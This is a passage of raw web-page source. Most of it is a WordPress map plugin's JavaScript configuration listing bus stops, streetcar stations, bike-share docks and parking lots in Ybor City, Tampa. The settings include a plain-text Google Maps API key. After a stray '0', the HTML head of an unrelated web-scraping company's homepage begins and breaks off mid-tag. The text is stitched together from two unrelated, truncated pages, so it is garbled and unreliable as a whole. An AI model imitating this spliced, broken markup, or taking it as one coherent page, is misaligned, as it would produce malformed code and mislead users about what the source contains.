-82.4441365711391","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.958099837","lng":"-82.4441365711","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"13":{"map_id":"1","marker_id":"13","title":"Bus Stop","address":"27.95981510260151, -82.44653983041644","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9598151026","lng":"-82.4465398304","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"14":{"map_id":"1","marker_id":"14","title":"Bus Stop","address":"27.958317800428595, -82.44715137407184","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9583178004","lng":"-82.4471513741","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"15":{"map_id":"1","marker_id":"15","title":"Bus Stop","address":"27.962146303881926, -82.44656128808856","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9621463039","lng":"-82.4465612881","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"16":{"map_id":"1","marker_id":"16","title":"Bus Stop","address":"27.96216525653153, -82.44063897058368","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9621652565","lng":"-82.4406389706","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"17":{"map_id":"1","marker_id":"17","title":"Centennial Park Station","address":"27.960963015266135, -82.43725678883493","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Streetcar.png","linkd":"https:\/\/www.google.com\/maps\/place\/Centennial+Park+Station\/@27.9610307,-82.4376555,19.75z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM5LjUiTiA4MsKwMjYnMTQuMSJX!3b1!8m2!3d27.960963!4d-82.4372568!3m4!1s0x88c2c45227146ddb:0x54fdd4f15c9d8066!8m2!3d27.9610259!4d-82.4372596","lat":"27.960963","lng":"-82.437257","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"18":{"map_id":"1","marker_id":"18","title":"Cadrecha Plaza Station","address":"27.960602910343557, -82.44550726376474","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Streetcar.png","linkd":"https:\/\/www.google.com\/maps\/place\/Cadrecha+Plaza+Station+(4)\/@27.9605702,-82.4455549,20.75z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM4LjIiTiA4MsKwMjYnNDMuOCJX!3b1!8m2!3d27.9606029!4d-82.4455073!3m4!1s0x88c2c45aff1dd6a7:0x605f44cc91ac3a06!8m2!3d27.9606829!4d-82.4455067","lat":"27.960603","lng":"-82.445507","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"19":{"map_id":"1","marker_id":"19","title":"Bus Stop","address":"27.960364739959818, -82.44686169549823","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.96036474","lng":"-82.4468616955","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"20":{"map_id":"1","marker_id":"20","title":"Bus Stop","address":"27.960288928076782, -82.44837446138263","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9602889281","lng":"-82.4483744614","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"21":{"map_id":"1","marker_id":"21","title":"Bus Stop","address":"27.962402164370708, -82.44337482377887","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9624021644","lng":"-82.4433748238","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"22":{"map_id":"1","marker_id":"22","title":"Bus Stop","address":"27.962383211762706, -82.43640108034015","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9623832118","lng":"-82.4364010803","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"23":{"map_id":"1","marker_id":"23","title":"Bus Stop","address":"27.962392688067112, -82.44029564782977","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9623926881","lng":"-82.4402956478","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"24":{"map_id":"1","marker_id":"24","title":"Bus Stop","address":"27.96245902217472, -82.44221610948443","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.962459","lng":"-82.442216","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"25":{"map_id":"1","marker_id":"25","title":"Bus Stop","address":"27.95799748138233, -82.43554692249745","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9579974814","lng":"-82.4355469225","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"26":{"map_id":"1","marker_id":"26","title":"Bustop","address":"27.95243455811915, -82.45091132819653","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9524345581","lng":"-82.4509113282","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"27":{"map_id":"1","marker_id":"27","title":"Centro Ybor Parking Garage","address":"27.959180173203702, -82.44231266900897","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Parking-Garage.png","linkd":"https:\/\/www.google.com\/maps\/place\/Centro+Ybor+Garage\/@27.9591227,-82.4423665,20.25z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzMzLjAiTiA4MsKwMjYnMzIuMyJX!3b1!8m2!3d27.9591802!4d-82.4423127!3m4!1s0x0:0x9e3df10fcbadcf40!8m2!3d27.9591501!4d-82.4424","lat":"27.95918","lng":"-82.442313","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"28":{"map_id":"1","marker_id":"28","title":"Ybor Lot 5","address":"27.960768748286096, -82.43863544426858","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Parking-Garage.png","linkd":"https:\/\/www.google.com\/maps\/place\/Ybor+Lot+5\/@27.9608032,-82.4387168,20.25z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM4LjgiTiA4MsKwMjYnMTkuMSJX!3b1!8m2!3d27.9607687!4d-82.4386354!3m4!1s0x0:0x7d13fffd5df4ca55!8m2!3d27.9607688!4d-82.438608","lat":"27.960769","lng":"-82.438635","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"29":{"map_id":"1","marker_id":"29","title":"Ybor Lot 6","address":"27.96074505716705, -82.4373587127775","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Parking-Garage.png","linkd":"https:\/\/www.google.com\/maps\/place\/Ybor+Lot+6\/@27.9607349,-82.4375295,20.25z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM4LjciTiA4MsKwMjYnMTQuNSJX!3b1!8m2!3d27.9607451!4d-82.4373587!3m4!1s0x0:0xd82e77c396ae412e!8m2!3d27.9608138!4d-82.4373849","lat":"27.960745","lng":"-82.437359","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"30":{"map_id":"1","marker_id":"30","title":"Ybor Lot 3","address":"27.959788875560363, -82.43734737625346","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Parking-Garage.png","linkd":"https:\/\/www.google.com\/maps\/place\/Ybor+Lot+3\/@27.9597916,-82.4375966,19.75z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM1LjIiTiA4MsKwMjYnMTQuNCJX!3b1!8m2!3d27.9597889!4d-82.4373474!3m4!1s0x0:0xe15a3b9ae3ee7e8e!8m2!3d27.9597513!4d-82.4373729","lat":"27.959789","lng":"-82.437347","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"31":{"map_id":"1","marker_id":"31","title":"Bus Stop","address":"27.96020489824188, -82.44309864006937","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9602048982","lng":"-82.4430986401","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"32":{"map_id":"1","marker_id":"32","title":"13th St and 8th Ave Coast Bike Share","address":"27.960986706337348, -82.44548044167459","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Coast-Bike.png","linkd":"https:\/\/www.google.com\/maps\/place\/Parking+Garage\/@27.9612545,-82.4455831,20.25z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x0:0x5e8b6bdfcb1f188a!8m2!3d27.9611177!4d-82.445848","lat":"27.960987","lng":"-82.44548","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"33":{"map_id":"1","marker_id":"33","title":"Centro Ybor","address":"27.961683221507062, -82.44173876009881","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Valet.png","linkd":"https:\/\/www.google.com\/maps\/place\/1913+N+16th+St,+Tampa,+FL+33605\/@27.9610549,-82.4439217,17z\/data=!3m1!4b1!4m5!3m4!1s0x88c2c4506bfcd7fd:0x554a1a5f792e6adf!8m2!3d27.9616886!4d-82.4417292","lat":"27.961683","lng":"-82.441739","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"34":{"map_id":"1","marker_id":"34","title":"9th and 16th Street","address":"27.961702174237963, -82.44158319197595","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Coast-Bike.png","linkd":"https:\/\/www.google.com\/maps\/place\/Coast+Bike+Share\/@27.9618054,-82.441468,20.25z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x0:0x9967c181041010b0!8m2!3d27.9617579!4d-82.4415176","lat":"27.961702","lng":"-82.441583","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"35":{"map_id":"1","marker_id":"35","title":"19th St. and E Pam Bike Share","address":"27.962278972359247, -82.437994312495","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Coast-Bike.png","linkd":"https:\/\/www.google.com\/maps\/place\/Coast+Bike+Share\/@27.9624443,-82.4379381,20.75z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x0:0x31ee5958f6d11fd0!8m2!3d27.9626748!4d-82.4380253","lat":"27.962279","lng":"-82.437994","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"36":{"map_id":"1","marker_id":"36","title":"Hart 5, 12","address":"27.964512842194537, -82.43477549403906","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9645128422","lng":"-82.434775494","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"37":{"map_id":"1","marker_id":"37","title":"Hart 8","address":"27.96026745790492, -82.4293252453208","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"","lat":"27.9602674579","lng":"-82.4293252453","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"38":{"map_id":"1","marker_id":"38","title":"Columbia Valet","address":"27.95973677312729, -82.43511881679296","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Valet.png","linkd":"https:\/\/www.google.com\/maps\/place\/Columbia+Restaurant\/@27.9602992,-82.4360092,18.25z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x0:0x3e9c07c7be9bec05!8m2!3d27.9599592!4d-82.4350769","lat":"27.959737","lng":"-82.435119","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"39":{"map_id":"1","marker_id":"39","title":"18th and 7th Bike Share","address":"27.960118351145297, -82.43931395933032","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Coast-Bike.png","linkd":"https:\/\/www.google.com\/maps\/place\/Coast+Bike+Share\/@27.9602247,-82.4383536,19z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x0:0x6259e3840c9cf63!8m2!3d27.9604217!4d-82.4392752","lat":"27.960118","lng":"-82.439314","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"40":{"map_id":"1","marker_id":"40","title":"Hart 8","address":"27.96024850492209, -82.4358269199729","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"https:\/\/www.google.com\/maps\/place\/7th+Av+@+19th+St\/@27.9601533,-82.4380696,21z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x88c2c45183bb90b7:0x5194af53404591ca!8m2!3d27.9603211!4d-82.4378107","lat":"27.960249","lng":"-82.435827","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"41":{"map_id":"1","marker_id":"41","title":"Hart 8","address":"27.960172692957435, -82.43799414485693","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-HART-Bus.png","linkd":"https:\/\/www.google.com\/maps\/place\/7th+Av+@+19th+St\/@27.9601533,-82.4380696,21z\/data=!4m13!1m7!3m6!1s0x0:0x0!2zMjfCsDU3JzM2LjYiTiA4MsKwMjYnMTYuOCJX!3b1!8m2!3d27.9601727!4d-82.4379941!3m4!1s0x88c2c4519d70303b:0x43df221ca2149550!8m2!3d27.9601487!4d-82.4381661","lat":"27.960173","lng":"-82.437994","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"42":{"map_id":"1","marker_id":"42","title":"15th and 7th Bike Share","address":"27.96026745790492, -82.44273629039526","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Coast-Bike.png","linkd":"https:\/\/www.google.com\/maps\/place\/Coast+Bike+Share\/@27.960338,-82.4426051,19.5z\/data=!4m12!1m6!3m5!1s0x88c2c450543e36a3:0x506cfba8652f7dbd!2sBernini+of+Ybor!8m2!3d27.960374!4d-82.4403644!3m4!1s0x0:0x65fd2d74b73805f3!8m2!3d27.9604277!4d-82.4430236","lat":"27.960267","lng":"-82.442736","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"43":{"map_id":"1","marker_id":"43","title":"Bernini of Ybor","address":"27.960213116140515, -82.44044048711658","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Valet.png","linkd":"https:\/\/www.google.com\/maps\/place\/Bernini+of+Ybor\/@27.960374,-82.4425531,17z\/data=!3m1!4b1!4m5!3m4!1s0x88c2c450543e36a3:0x506cfba8652f7dbd!8m2!3d27.960374!4d-82.4403644","lat":"27.960213","lng":"-82.44044","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":""},"44":{"map_id":"1","marker_id":"44","title":"YCDC Office","address":"2015 East 7th Avenue, Tampa, FL, USA","desc":"","pic":"","icon":"https:\/\/cdn.yborcityonline.com\/wp-content\/uploads\/2018\/02\/three.png","linkd":"https:\/\/www.google.com\/maps\/place\/ybor+city+incentives\/@27.9602765,-82.436091,3a,75y,172.18h,90t\/data=!3m7!1e1!3m5!1sGV19RHaFGpzdmkezUYrebA!2e0!6sgeo0.ggpht.comcbkpanoidGV19RHaFGpzdmkezUYrebAoutputthumbnailcb_clientsearch.TACTILE.gpsthumb2w86h86yaw172.18173pitch0thumbfov100!7i13312!8i6656!4m8!1m2!2m1!1sybor+city+development+corporation!3m4!1s0x0:0xe61176e419c7eeb0!8m2!3d27.9600791!4d-82.436068","lat":"27.960054","lng":"-82.436073","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":["0"]},"45":{"map_id":"1","marker_id":"45","title":"PMS Inc.","address":"27.9593753, -82.4414641","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2016\/11\/YCDC-Map-Icons-Parking-Garage.png","linkd":"https:\/\/www.google.com\/maps\/place\/PMS+Parking+Lot\/@27.9593753,-82.4436528,17z\/data=!4m13!1m7!3m6!1s0x88c2c45092d814b5:0x9a71d25290c555d4!2s1601+E+6th+Ave,+Tampa,+FL+33605!3b1!8m2!3d27.9593753!4d-82.4414641!3m4!1s0x88c2c450949e77e5:0x5de2f4bb1694b133!8m2!3d27.9591794!4d-82.4415281","lat":"0","lng":"0","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":["0"]},"46":{"map_id":"1","marker_id":"46","title":"Don Vicente Lot","address":"27.963124, -82.444231","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.963124","lng":"-82.444231","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":["0"]},"47":{"map_id":"1","marker_id":"47","title":"Corwin Lot","address":"27.959473, -82.445208","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.959473","lng":"-82.445208","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"48":{"map_id":"1","marker_id":"48","title":"Channelside Lot","address":"27.954013, -82.445515","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"0","lng":"0","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":["0"]},"49":{"map_id":"1","marker_id":"49","title":"Masonite","address":"27.958747, -82.444566","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.958747","lng":"-82.444566","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"50":{"map_id":"1","marker_id":"50","title":"Working Radius Lot","address":"27.958751, -82.444039","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.958751","lng":"-82.444039","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"51":{"map_id":"1","marker_id":"51","title":"Tire Depot Lot","address":"27.958042, -82.443920","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.958042","lng":"-82.44392","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"52":{"map_id":"1","marker_id":"52","title":"Al\u2019s BBQ Lot","address":"27.958900, -82.439230","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.9589","lng":"-82.43923","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"53":{"map_id":"1","marker_id":"53","title":"Tropicana Lot","address":"27.960345, -82.438877","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.960345","lng":"-82.438877","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"54":{"map_id":"1","marker_id":"54","title":"Gaspars Rum Lot","address":"27.958003, -82.435372","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.958003","lng":"-82.435372","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"55":{"map_id":"1","marker_id":"55","title":"Shrimp & Co Lot","address":"27.960323, -82.434445","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.960323","lng":"-82.434445","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]},"56":{"map_id":"1","marker_id":"56","title":"Tonys Restaurant Lot","address":"27.961808, -82.434648","desc":"","pic":"","icon":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2018\/10\/zevo.png","linkd":"http:\/\/epstampa.com\/","lat":"27.961808","lng":"-82.434648","anim":"0","retina":"0","category":"0","infoopen":"0","other_data":[]}}};var wpgmaps_localize_cat_ids={"1":"all"};var wpgmaps_localize_map_types={"1":""};var wpgmaps_localize_global_settings={"wpgmza_settings_image_resizing":"yes","wpgmza_settings_image_width":"","wpgmza_settings_image_height":"","wpgmza_settings_infowindow_width":"","wpgmza_settings_infowindow_link_text":"More details","wpgmza_settings_map_scroll":"yes","wpgmza_settings_map_striptags":"0","wpgmza_settings_ugm_autoapprove":"0","wpgmza_settings_ugm_email_new_marker":"0","wpgmza_custom_css":"","wpgmza_settings_carousel_markerlist_address":"yes","wpgmza_settings_carousel_markerlist_description":"yes","wpgmza_settings_carousel_markerlist_marker_link":"yes","wpgmza_settings_carousel_markerlist_directions":"yes","wpgmza_settings_carousel_markerlist_resize_image":"yes","wpgmza_settings_carousel_markerlist_theme":"sky","wpgmza_default_items":"10","carousel_items":"5","carousel_autoplay":"5000","carousel_lazyload":"yes","carousel_autoheight":"yes","carousel_navigation":"yes","wpgmza_settings_filterbycat_type":"1","wpgmza_settings_map_open_marker_by":"1","wpgmza_api_version":"3.31","wpgmza_settings_access_level":"manage_options","wpgmza_settings_retina_width":"31","wpgmza_settings_retina_height":"45","wpgmza_settings_marker_pull":"0","wpgmza_iw_type":"-1","wpgmza_settings_carousel_markerlist_image":"","wpgmza_settings_carousel_markerlist_icon":"","wpgmza_settings_carousel_markerlist_title":"","wpgmza_settings_carousel_markerlist_link":"","wpgmza_settings_use_timthumb":"yes","carousel_pagination":"","wpgmza_gdpr_enabled":"1","wpgmza_gdpr_notice":"I agree for my personal data to be processed by {COMPANY_NAME}.\r\n\t\t\r\nI agree for my personal data, provided via map API calls, to be processed by the API provider, for the purposes of geocoding (converting addresses to coordinates), reverse geocoding and generating directions.\r\n\r\nSome visual components of WP Google Maps use 3rd party libraries which are loaded over the network. At present the libraries are Google Maps, Open Street Map, jQuery DataTables and FontAwesome. When loading resources over a network, the 3rd party server will receive your IP address and User Agent string amongst other details. Please refer to the Privacy Policy of the respective libraries for details on how they use data and the process to exercise your rights under the GDPR regulations.\r\n\r\nWP Google Maps uses jQuery DataTables to display sortable, searchable tables, such as that seen in the Advanced Marker Listing and on the Map Edit Page. jQuery DataTables in certain circumstances uses a cookie to save and later recall the \"state\" of a given table - that is, the search term, sort column and order and current page. This data is help in local storage and retained until this is cleared manually. No libraries used by WP Google Maps transmit this information.\r\n\r\nPlease <a href=\"https:\/\/developers.google.com\/maps\/terms\">see here<\/a> and <a href=\"https:\/\/maps.google.com\/help\/terms_maps.html\">here<\/a> for Google's terms. Please also see <a href=\"https:\/\/policies.google.com\/privacy?hl=en-GB&gl=uk\">Google's Privacy Policy<\/a>. We do not send the API provider any personally identifying information, or information that could uniquely identify your device.\r\n\r\nWhere this notice is displayed in place of a map, agreeing to this notice will store a cookie recording your agreement so you are not prompted again.","wpgmza_gdpr_retention_purpose":"presenting the data you have submitted on the map.","wpgmza_google_maps_api_key":"AIzaSyCq_h5YRnQomhjoSnTyyykgII6mdC-46wc","list_markers_by":""};var wpgmaps_localize_categories={"1":{"1":0,"2":0,"3":0,"4":0,"5":0}};var wpgmaps_localize_polygon_settings=[];var wpgmaps_localize_polyline_settings={"1":{"1":{"id":"1","map_id":"1","polydata":[],"linecolor":"FF0000","linethickness":"4","opacity":"0.8","polyname":"Bike Lane","fillcolor":"66FF00"}}};var wpgmaps_localize_heatmap_settings=[];var wpgmaps_markerurl="https:\/\/yborcityonline.com\/wp-content\/uploads\/wp-google-maps\/";var wpgmaps_lang_more_details="More details";var wpgmaps_lang_get_dir="Get directions";var wpgmaps_lang_my_location="My location";var wpgmaps_lang_km_away="km away";var wpgmaps_lang_m_away="miles away";var wpgmaps_lang_directions="Directions";var wpgmaps_lang_more_info="More details";var wpgmaps_lang_error1="Please fill out both the \"from\" and \"to\" fields";var wpgmaps_lang_getting_location="Getting your current location address...";var wpgm_dt_sLengthMenu="Show _MENU_ entries";var wpgm_dt_sZeroRecords="Nothing found - sorry";var wpgm_dt_sInfo="Showing _START_ to _END_ of _TOTAL_ records";var wpgm_dt_sInfoEmpty="Showing 0 to 0 of 0 records";var wpgm_dt_sInfoFiltered="(filtered from _MAX_ total records)";var wpgm_dt_sFirst="First";var wpgm_dt_sLast="Last";var wpgm_dt_sNext="Next";var wpgm_dt_sPrevious="Previous";var wpgm_dt_sSearch="Search";var ajaxurl="https:\/\/yborcityonline.com\/wp-admin\/admin-ajax.php";var wpgmaps_pro_nonce="1d3c117167";var wpgmaps_plugurl="https:\/\/yborcityonline.com\/wp-content\/plugins\/wp-google-maps\/";var marker_pull="0";var wpgm_g_e="0";/*]]>*/</script> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/e735e.js></script> <script>var wpgmza_circle_data_array=[];var wpgmza_rectangle_data_array=[];</script> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/502df.js></script> </body></html>
0
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="google-site-verification" content="Y827R-QtV2o4erpe7czAkXIx8DhlYpmXtALK0wFtN9U" /> <title>Grepsr | Web Scraping Service Platform</title> <meta name="keywords" content="Price scraping, Web scraping, Scraper, Extractor, Scraper extension, Chrome Extension, Scraping software, Best Scraping, Website data, Extract, Scraping online, Screen scraping, Web Extractor, Web Scraper, Website scraping, Scraping tool, Scraping services, Best Extract"> <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.4.0/animate.min.css"> <link rel="stylesheet" type="text/css" href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/css/hadies.css" /> <!-- google fonts start --> <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css"> <link rel="shortcut icon" href="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/favicon.png" type="image/x-icon"> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <!-- This site is optimized with the Yoast SEO plugin v9.6 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Simplify data extraction with easy-to-use web scraping service platform and manage it better with powerful features and 24/7 support. Sign up free!"/> <link rel="canonical" href="https://www.grepsr.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Grepsr | Web Scraping Service Platform" /> <meta property="og:description" content="Simplify data extraction with easy-to-use web scraping service platform and manage it better with powerful features and 24/7 support. Sign up free!" /> <meta property="og:url" content="https://www.grepsr.com/" /> <meta property="og:site_name" content="Grepsr" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Simplify data extraction with easy-to-use web scraping service platform and manage it better with powerful features and 24/7 support. Sign up free!" /> <meta name="twitter:title" content="Grepsr | Web Scraping Service Platform" /> <meta name="twitter:site" 